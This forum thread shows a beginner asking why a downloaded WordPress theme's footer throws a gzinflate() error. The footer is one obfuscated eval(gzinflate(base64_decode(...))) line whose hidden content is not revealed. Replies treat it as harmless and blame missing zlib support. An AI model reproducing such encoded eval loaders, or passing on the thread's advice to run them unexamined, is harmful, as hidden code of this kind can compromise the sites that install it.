Help with Wordpress footer

Hi folks, my first time here.

After searching a very long time for a good wordpress theme I came across the perfect one. However, out of the many that I downloaded, the one I really want to use gives me an error in the footer:

Fatal error: Call to undefined function gzinflate() in /www/.org/a/e/g/****/htdocs/blog/wp-content/themes/tecno-tech-11/footer.php on line 1

I have just started learing about all this so at the moment have no idea about PHP coding but did notice that this footer seems different from the other themes. Was wondering if anyone could shed some light on the problem. Maybe it’s an older theme which is not compatible with the latest wordpress release but really I have no idea. Here is the code for the themes footer:

<?php eval(gzinflate(base64_decode('fZLbbsIwDIav6VNYmTTKBZRxNY00SKDxAIC2y6oU9yC1cZYEKqQ9/NLD0IaAXrSVY3/x/9sL4fFDcYKkjI0J2ZrIomYCPACuBDdWk8wE32vhIi6WkrSQUEk6ZE/r9mFiReqsiyy38Jy43znMptNXGHcVC9iXlBUyJX8o4wqHozksBA8a0iMotGc7TCQ17xyWZ5caQ64xDVlurXoLgrquJ6c4iW1BUmNc2vMkoYqJjz7WQTYobVwaHsQCxrDUdGx63Z9v4mplc6zQpBqxgQUMbGFLDNkn6YPSaAzs2gwmriPNDb0yHvx6FyjhDXo/byq9dMEXKld/7NLGzKKjLjvLmHiXVhdowN9st6NWzTfcLXatV063ia4pq/6g8+bCmkBHcFYTZGgjeayiryM2N/pt6Z1B9TmTXjj0Y29YtqhQR8aS8l9axIN5G0xIHi6YzrZBx6lVlLab6f9bHh641RXe1bct8eAH')));?>

Thanks in advance
ps. the footer seems to work fine in the online preview of the site I downloaded it from

Hi there,

I dont get any errors personally with that code, certainly not to do with gzinflate() - make sure the PHP version on this server is up-to-date enough, I believe that function requires PHP 4 or higher.

Let me know how you get on.

Hi Smokeys, thanks for the reply.

My site is hosted on http://www.zymic.com/ and they have PHP Ver 5.2.12. Maybe I need to check to see if Gzip is not allowed or I need to enable it somehow. I haven’t had any other problems with WP or MyBB. By the way if anyone is looking for a good free (or paid) web host I would highly recommend Zymic.

Hi there,

Just to let you know, if you don’t already, your host doesn’t use zlib (the library needed by gzinflate)

And thanks for the recommendation, might try them out at some point :smiley:

Hope all goes well.

Sponsor our Newsletter | Privacy Policy | Terms of Service